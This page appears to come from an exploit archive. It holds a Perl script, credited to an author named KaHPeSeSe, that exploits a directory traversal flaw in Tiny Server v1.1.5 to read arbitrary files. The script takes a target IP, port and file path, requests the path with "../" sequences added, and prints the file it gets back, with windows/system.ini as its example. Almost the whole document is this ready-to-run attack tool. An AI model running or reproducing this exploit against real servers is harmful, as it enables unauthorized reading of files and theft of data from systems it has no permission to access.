Home / exploits Tiny Server 1.1.5 Arbitrary File Disclosure
Posted on 17 March 2012
#!/usr/bin/perl -w #Title : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit #Author : KaHPeSeSe #Test : PERFECT XP PC1 / SP3 #Date : 15/03/2012 #Thanks : exploit-db.com use LWP::Simple; use LWP::UserAgent; system('color','A'); system('cls'); print " ____________________________________________________________________ "; print " ....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit ....... "; print " ....... Founded and Exploited by KaHPeSeSe ....... "; print " ____________________________________________________________________ "; if(@ARGV < 3) { print "[-] Error! "; print "[-] Look to example "; &help; exit(); } sub help() { print "[+] How to : perl $0 IP Port File "; print "[+] Example : perl $0 192.168.1.2 80 windows/system.ini "; } ($TargetIP, $Port, $File) = @ARGV; print("Connet to Server.... "); sleep(2); $path="/../../"; my $link = "http://" . $TargetIP . ":" . $Port . $path . $File; print("Connected "); sleep(2); print("Waiting for moment "); sleep(1); print("Done! Reading $File... "); sleep(3); $ourfile=get $link; if($ourfile) { print(" ____________________________________________________ "); print("$ourfile "); print("_____________________________________________________ "); } else { print("_____________________________________________________ "); print(" Not Found !!! "); print("_____________________________________________________ "); exit; }
